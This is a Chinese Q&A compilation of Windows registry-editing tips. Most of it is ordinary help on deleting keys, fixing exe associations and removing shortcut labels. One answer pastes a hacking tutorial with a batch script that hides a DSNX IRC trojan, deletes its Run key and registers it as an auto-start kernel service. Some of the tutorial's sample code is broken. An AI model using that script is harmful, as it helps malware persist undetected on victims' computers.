去注冊表
Ⅰ 如何運行注冊表,找到卸載軟體不徹底時留下的文件夾,去刪除它!
1,進入注冊表的方法,在開始菜單中打開「運行」,也可以直接按win+r啟動運行。
2,在打開內的運行框中,容輸入regedit命令,按確定,
3,這就進入了注冊表,進入之後,點菜單上的「編輯」,在打開的下拉菜單中選擇「查找」。
4,然後用ctrl+f查找「所要刪除文件的名字''將滑鼠會定位到懿個文件夾,直接吧它刪除就可以了。
Ⅱ 自己創建了個reg文件 導入到注冊表裡去了 怎麼刪除
運行regedit,進入注冊表,
找到和刪除
HKEY_LOCAL_MACHINE\SOFTWARE\CAPCOM\STREET FIGHTER IV]
"InstallDir"="X:\\CAPCOM\\Street Fighter IV\\"
就OK了!Windows優化大師應該可以清理掉,不過我專覺得不刪問題不大
但是屬會影響到你游戲,最好還是刪了吧
Ⅲ 怎麼去刪除注冊表[HKEY_CURRENT_USER\Software\RocketDock]的所有項值!!一步步來!我是電腦小白
你好
試試下面方法
步驟/方法
1.依次打開「開始菜單——所有程序——附件」
2.右擊專「命令屬提示符」,單擊「以管理員身份運行」
3.在命令提示符窗口下鍵入
reg delete "HKEY_CURRENT_USER\Software\RocketDock" /f
Ⅳ 修改注冊表之後所有應用程序都打不開了 注冊表也打不開cmd也進不去 求助求助!
你 好
把下面 代碼 用 記事本 保存 reg 文件版
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
雙擊導入權 即可
Ⅳ 怎樣消除電腦記錄,有關注冊表之類
可以使用系統類軟體清除,例如360安全衛士、金山衛士、網路衛士等,還可以用優化版大師有直接權清理注冊表垃圾的。一定要進入注冊表的話請千萬慎改。
一些清除方法:
1.在「開始」-------「運行」---------鍵入「msonfig」後選擇「啟動『就進入注冊表開機運行程序設置了,在口內取消√來控制開機不要運行的程序。
2.在開始」-------「運行」---------鍵入「Regedit」來進入注冊表,可以根據要調解的選項進行查找修改。 這些都要慎用,如果取消了不改取消的東西或者修改的不恰當,會造成電腦沒有聲音,程序不運行還可能死機。那樣就得重做系統了。
Ⅵ 如何新建一個regedit文件,打開運行一下就可以把自己些的信息添加到注冊表上面去
打開記事本新建一個.reg文件就可以了。
補充:具體的寫法建議參考以下說明文字:
如何用批處理文件來操作注冊表
在入侵過程中經常回操作注冊表的特定的鍵值來實現一定的目的,例如:為了達到隱藏後門、木馬程序而刪除Run下殘余的鍵值。或者創建一個服務用以載入後門。當然我們也會修改注冊表來加固系統或者改變系統的某個屬性,這些都需要我們對注冊表操作有一定的了解。下面我們就先學習一下如何使用.REG文件來操作注冊表.(我們可以用批處理來生成一個REG文件)
關於注冊表的操作,常見的是創建、修改、刪除。
1.創建
創建分為兩種,一種是創建子項(Subkey)
我們創建一個文件,內容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
然後執行該腳本,你就已經在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下創建了一個名字為「hacker」的子項。
另一種是創建一個項目名稱
那這種文件格式就是典型的文件格式,和你從注冊表中導出的文件格式一致,內容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
這樣就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about這三個項目
Invader的類型是「String Value」
door的類型是「REG SZ Value」
Autodos的類型是「DWORD Value」
2.修改
修改相對來說比較簡單,只要把你需要修改的項目導出,然後用記事本進行修改,然後導入(regedit /s)即可。
3.刪除
我們首先來說說刪除一個項目名稱,我們創建一個如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
執行該腳本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被刪除了;
我們再看看刪除一個子項,我們創建一個如下的腳本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
執行該腳本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已經被刪除了。
相信看到這里,.reg文件你基本已經掌握了。那麼現在的目標就是用批處理來創建特定內容的.reg文件了,記得我們前面說道的利用重定向符號可以很容易地創建特定類型的文件。
samlpe1:如上面的那個例子,如想生成如下注冊表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要這樣:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我們現在在使用一些比較老的木馬時,可能會在注冊表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一個鍵值用來實現木馬的自啟動.但是這樣很容易暴露木馬程序的路徑,從而導致木馬被查殺,相對地若是將木馬程序注冊為系統服務則相對安全一些.下面以配置好地IRC木馬DSNX為例(名為windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [刪除DSNXDE在注冊表中的啟動項,用sc.exe將之注冊為系統關鍵性服務的同時將其屬性設為隱藏和只讀,並config為自啟動]
@REM 這樣不是更安全^_^.
Ⅶ 注冊表進不去怎麼辦
1.管理員是通過gpedit.msc禁用的,或者通過注冊表本身禁用
2.改個名就能用了,在c:\windows\目錄下,只要不改擴展名.
Ⅷ 注冊表編輯器開機自啟怎麼去了
用WINDOWS優化大師的「開機速度優化」功能來查看注冊表編輯器在哪裡啟動,把它給取消啟動就行了。
Ⅸ 如何修改注冊表去掉 快捷方式 到 這幾個字
你好,不需要安裝任何東西,只要修改一下注冊表就可以了,我把相關的注冊表項寫成下面的代碼,你只要把下面的代碼復制到記事本中,保存為.reg文件,就可以直接導入注冊表了。;--------------------------------------------------Windows Registry Editor Version 5.00;刪除圖標「快捷方式」的字樣
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer]
"Link"=hex:00,00,00,00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"Link"=hex:00,00,00,00;--------------------------------------------------【附】如果你想要手動修改注冊表,也可以,如果你知道上面的代碼是什麼意思的話。運行 regedit ,按上面代碼的路徑分別找到對應位置,把相應位置的Link項改成相應的值。如果你不知道上面的代碼什麼意思,或者不會手動修改注冊表,或者還有其他什麼問題,歡迎繼續追問,我將教你如何去做。
Ⅹ 注冊表去開機自檢
打開注冊表來(運行里自輸入:regedit)找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
再找到右邊這個值:BootExecute把裡面的數據全部刪除就可以了。。。。